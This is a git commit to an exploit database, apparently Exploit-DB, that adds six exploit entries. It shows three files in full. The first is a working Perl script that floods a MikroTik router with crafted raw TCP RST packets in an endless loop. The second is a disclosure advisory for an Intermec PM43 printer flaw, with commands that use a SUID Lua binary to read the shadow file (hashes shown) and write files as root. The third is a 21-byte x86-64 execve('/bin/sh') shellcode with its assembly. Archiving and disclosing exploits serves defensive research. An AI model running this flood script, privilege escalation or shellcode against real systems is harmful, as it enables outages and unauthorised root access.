DB: 2017-03-29

6 new exploits MikroTik RouterBoard 6.38.5 - Denial of Service VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow Microsoft Outlook - HTML Email Denial of Service Intermec PM43 Industrial Printer - Privilege Escalation DzSoft PHP Editor 4.2.7 - File Enumeration Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)
bmoar · Mar 29, 2017 · 8f7e041 · 8f7e041
1 parent 1f8c35c
commit 8f7e041
Show file tree

Hide file tree

Showing 7 changed files with 731 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -5430,6 +5430,9 @@ id,file,description,date,author,platform,type,port
 41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0
 41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0
 41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0
+41752,platforms/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,hardware,dos,0
+41755,platforms/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,windows,dos,0
+41756,platforms/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8893,6 +8896,7 @@ id,file,description,date,author,platform,type,port
 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
+41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15399,6 +15403,7 @@ id,file,description,date,author,platform,type,port
 41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
+41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16029,6 +16034,7 @@ id,file,description,date,author,platform,type,port
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
+41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0

diff --git a/platforms/hardware/dos/41752.pl b/platforms/hardware/dos/41752.pl
@@ -0,0 +1,106 @@
+#!/usr/local/bin/perl
+
+use Socket;
+
+$src_host =3D $ARGV[0];=20
+$src_port =3D $ARGV[1];=20
+$dst_host =3D $ARGV[2];=20
+$dst_port =3D $ARGV[3];=20
+
+if(!defined $src_host or !defined $src_port or !defined $dst_host or !defin=
+ed $dst_port)=20
+{
+=09
+=09print "Usage: $0 <source host> <source port> <dest host> <dest port>\n";
+=09exit;
+}=20
+else=20
+{
+=09
+=09main();
+}
+=20
+sub main=20
+{
+=09my $src_host =3D (gethostbyname($src_host))[4];
+=09my $dst_host =3D (gethostbyname($dst_host))[4];
+=09$IPROTO_RAW =3D 255;
+=09socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW)=20
+=09=09or die $!;
+=09my ($packet) =3D makeheaders($src_host, $src_port, $dst_host, $dst_port)=
+;
+=09my ($destination) =3D pack('Sna4x8', AF_INET, $dst_port, $dst_host);
+=09while(1)
+=09{
+=09=09send($sock , $packet , 0 , $destination)
+=09=09=09or die $!;
+=09}
+}
+
+sub makeheaders=20
+{
+=09$IPPROTO_TCP =3D 6;
+=09local($src_host , $src_port , $dst_host , $dst_port) =3D @_;
+=09my $zero_cksum =3D 0;
+=09my $tcp_len =3D 20;
+=09my $seq =3D 19456;
+=09my $seq_ack =3D 0;
+=09my $tcp_doff =3D "5";
+=09my $tcp_res =3D 0;
+=09my $tcp_doff_res =3D $tcp_doff . $tcp_res;
+=09my $tcp_urg =3D 0;=20
+=09my $tcp_ack =3D 0;
+=09my $tcp_psh =3D 0;
+=09my $tcp_rst =3D 1;
+=09my $tcp_syn =3D 0;
+=09my $tcp_fin =3D 0;
+=09my $null =3D 0;
+=09my $tcp_win =3D 124;
+=09my $tcp_urg_ptr =3D 44;
+=09my $tcp_flags =3D $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_=
+rst . $tcp_syn . $tcp_fin ;
+=09my $tcp_check =3D 0;
+=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
+eq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
+=09my $tcp_pseudo =3D pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TC=
+P, length($tcp_header) ) . $tcp_header;
+=09$tcp_check =3D &checksum($tcp_pseudo);
+=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s=
+eq_ack , $tcp_doff_res, $tcp_flags,  $tcp_win , $tcp_check, $tcp_urg_ptr);
+=09my $ip_ver =3D 4;
+=09my $ip_len =3D 5;
+=09my $ip_ver_len =3D $ip_ver . $ip_len;
+=09my $ip_tos =3D 00;
+=09my $ip_tot_len =3D $tcp_len + 20;
+=09my $ip_frag_id =3D 19245;
+=09my $ip_ttl =3D 25;
+=09my $ip_proto =3D $IPPROTO_TCP;=09
+=09my $ip_frag_flag =3D "010";
+=09my $ip_frag_oset =3D "0000000000000";
+=09my $ip_fl_fr =3D $ip_frag_flag . $ip_frag_oset;
+=09my $ip_header =3D pack('H2CnnB16CCna4a4',=09$ip_ver_len, $ip_tos, $ip_to=
+t_len, $ip_frag_id,=09$ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_=
+host , $dst_host);
+=09my $pkt =3D $ip_header . $tcp_header;
+=09return $pkt;
+}
+sub checksum=20
+{
+=09my ($msg) =3D @_;
+=09my ($len_msg,$num_short,$short,$chk);
+=09$len_msg =3D length($msg);
+=09$num_short =3D $len_msg / 2;
+=09$chk =3D 0;
+=09
+=09foreach $short (unpack("S$num_short", $msg))=20
+=09{
+=09=09$chk +=3D $short;
+=09}
+=09
+=09$chk +=3D unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
+=09$chk =3D ($chk >> 16) + ($chk & 0xffff);
+=09
+=09return(~(($chk >> 16) + $chk) & 0xffff);
+}=20
+
+
diff --git a/platforms/hardware/local/41754.txt b/platforms/hardware/local/41754.txt
@@ -0,0 +1,140 @@
+# TITLE: Intermec Industrial Printers Local root with Busybox jailbreak
+
+# Date: March 28th, 2017
+# Author: Bourbon Jean-marie (kmkz) from AKERVA company | @kmkz_security
+
+# Product Homepage:
+    http://www.intermec.com/products/prtrpm43a/
+
+# Firmware download:
+    http://www.intermec.com/products/prtrpm43a/downloads.aspx
+
+# Tested on :
+    model: PM43 RFID Industrial printer   
+    firmware version: 10.10.011406
+    kernel: Linux PM43-xxxxxxx 2.6.31 #1 PREEMPT Mon Oct 26 10:49:59 SGT 2015 armv5tejl GNU/Linux
+
+# CVSS: 7.5 (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H)
+# OVE ID: OVE-20170131-0001
+# CVE ID: CVE-2017-5671
+# OSVDB ID: n/a
+
+# Thanks:
+    Dany Bach (Rioru) from AKERVA company for the exploitation design during the pentest during which the CVE-2017-5671 was discovered | @DDXhunter
+    Honeywell team which was really reactive (with special thanks to Kevin Staggs) !
+
+# Credits:
+    The security notification that Intermec (Honeywell) sent to all of their dealers: 
+     https://github.com/kmkz/exploit/blob/master/CVE-2017-5671-Credits.pdf 
+
+# Additional ressource:
+  https://akerva.com/blog/intermec-industrial-printers-local-root-with-busybox-jailbreak/
+
+# Affected products:
+    PM23, PM42, PM43, PC23, PC43, PD43 and PC42 printers with versions prior to March 2017
+
+# Fixes:
+    Download the new firmware version by using the link below:
+    http://epsfiles.intermec.com/eps_files/eps_download/Firmware_P10.11.013310.zip
+
+# Release note:
+    http://apps.intermec.com/downloads/eps_download/Firmware%20Release%20Notes%20x10_11_013310.pdf
+
+
+Intermec (Honeywell) Industrial RFID Printers Local root privilege escalation with Busybox jailbreak
+
+I. PRODUCT
+
+PM43/PM43c mid-range industrial RFID printers are ideal for a wide range of applications within the distribution center / warehouse and manufacturing environments.
+
+II. ADVISORY
+
+Using a bad file permission, it is possible to gain full root privilege on a PM43 industrial printer as well as from the admin account than it-admin which are the two default users on the machine.
+It also permits to gain full privilege resulting on a Busybox jailbreak due to the root access on the system.
+The impact of this exploitation is quite critical due to the sensitive information that are available and impact the recent firmware version release (before  March 12th 2017).
+
+III. VULNERABILITY DESCRIPTION
+
+The Lua binary rights are too permissive and this one is SUID which conduct to perform this privilege escalation using a basic trick as describe in the next section.
+The default it-admin and/or admin credentials are available in the vendor's documentation and should be modified too.
+
+IV. PROOF OF CONCEPT
+
+Following steps can reproduce the privilege escalation once the attacker gain a Busybox shell on the system:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ find / -perm -g=s -type f 2>/dev/null
+/bin/busybox
+/usr/bin/cfg
+/usr/bin/lua <----- Lua binary with SUID perm.
+/usr/bin/httpd_restore
+/usr/bin/ikev2
+/usr/bin/pwauth
+/usr/bin/functest
+/usr/bin/imecutil
+/usr/bin/httpd_fwupgrade
+/usr/sbin/setkey
+
+We then try to execute a shell command using Lua but it seems that this one is executed with non-root privileges through the Busybox shell:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ /usr/bin/lua
+Lua 5.1.4  Copyright (C) 1994-2008 Lua.org, PUC-Rio
+> os.execute("id")
+uid=1(itadmin) gid=1(itadmin) groups=1(itadmin),2(admin),3(user)
+
+So we identify that it is possible to read/write files with root privilege on the file system without any restrictions (we will be able to modify the shadow file in order to log in as root later):
+
+// in the Lua interpreter:
+
+> f=io.open("/etc/shadow","rb")
+> print(f)
+file (0x17af0)
+> c=f:read "*a"
+> print(c)
+root:!$1$XPCuiq25$IvWw/kKeomOyQIee8XfTb1:11851:0:99999:7:::
+admin:$1$Ma/qTlIw$PPPTgRVCnkqcDQxjMBtsC0:11851:0:99999:7:::
+itadmin:$1$kcHXJUjT$OIgLfTDgaEAlTbHRZFPsj.:11851:0:99999:7:::
+user::11851:0:99999:7:::
+ftp:*:11851:0:99999:7:::
+nobody:*:11851:0:99999:7:::
+lighttpd:x:1000:1000:Linux User,,,:/home/lighttpd:/bin/sh
+
+We conclude this "proof of concept" by writing a file on the filesystem which demonstrate the possibilities that we now have using this kind of code:
+
+fp = io.popen("akerva", "w")
+fp:write(anything)
+fp:close()
+
+That gave us the following output:
+
+itadmin@PM43-XXXXXXXXXXX /tmp$ cat akerva
+AKERVA r00t
+itadmin@PM43-XXXXXXXXXXX /tmp$ ls -alsh akerva
+   4 -rw-rw-r--    1 root     root           12 Jan 25 07:12 akerva
+
+As explained in the above text, we then over-writed the "etc/shadow" file and we validated that it is possible to gain full root access on the filesystem even if Busybox 1.15.0 (2009 release) were present, bypassing
+its shell restrictions (jailbreaking it).
+
+V. RECOMMENDATIONS
+
+AKERVA's Pentesters recommended to fix it by modifying the Lua binary rights (is the SUID bit necessary?) which was done in the patched firmware.
+A security fix is now available in order to mitigate this issue as shown at the beginning of this advisory.
+
+VI. VERSIONS AFFECTED
+
+This issue affects the firmware version 10.10.011406 but after reading the latest release notes it also seems to impact all versions that were released before the updated firmware.
+
+VII. TIMELINE
+
+January 19th, 2017: Vulnerability identification
+January 27th, 2017: First contact with the editor (Honeywell)
+January 31th, 2017: Advisory submission to Honeywell security team and CVE id request
+February 1st, 2017: CVE id attributed by MITRE even if the vendor is not normally considered a priority for CVE by MITRE
+February 6th, 2017: Vendor confirm the vulnerability
+February 16th, 2017: Vendor inform that the fix is ready (They also proposed me to test it prior to release)
+March 12th, 2017: New firmware version available
+March 28th, 2017: Public advisory released
+
+VIII. LEGAL NOTICES
+
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of this advisory.
diff --git a/platforms/lin_x86-64/shellcode/41750.txt b/platforms/lin_x86-64/shellcode/41750.txt
@@ -0,0 +1,63 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c) <year> <copyright holders>
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+; 
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+; 
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+;     Name : Linux/x86-64 - execve("/bin/sh") 21 Bytes
+;     Author : WangYihang
+;     Email : wangyihanger@gmail.com
+;     Tested on: Linux_x86-64
+;================================================================================
+; Shellcode (c array) : 
+char shellcode[] = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69"
+                             "\x6e\x2f\x2f\x73\x68\x57\x48\x89"
+                             "\xe7\xb0\x3b\x0f\x05";
+;================================================================================
+; Shellcode (python) : 
+shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
+;================================================================================
+; objdump -d ./shellcode
+shellcode:     file format elf64-x86-64
+Disassembly of section .text:
+0000000000400080 <_start>:
+  400080:       f7 e6                   mul    %esi
+  400082:       50                      push   %rax
+  400083:       48 bf 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rdi
+  40008a:       2f 73 68 
+  40008d:       57                      push   %rdi
+  40008e:       48 89 e7                mov    %rsp,%rdi
+  400091:       b0 3b                   mov    $0x3b,%al
+  400093:       0f 05                   syscall 
+;================================================================================
+; Assembly language code : 
+; You can asm it by using : 
+; nasm -f elf64 ./shellcode.asm
+; ld -o shellcode shellcode.o
+global _start
+        _start:
+                mul esi
+                push rax
+                mov rdi, "/bin//sh"
+                push rdi
+                mov rdi, rsp
+                mov al, 59
+                syscall
+;================================================================================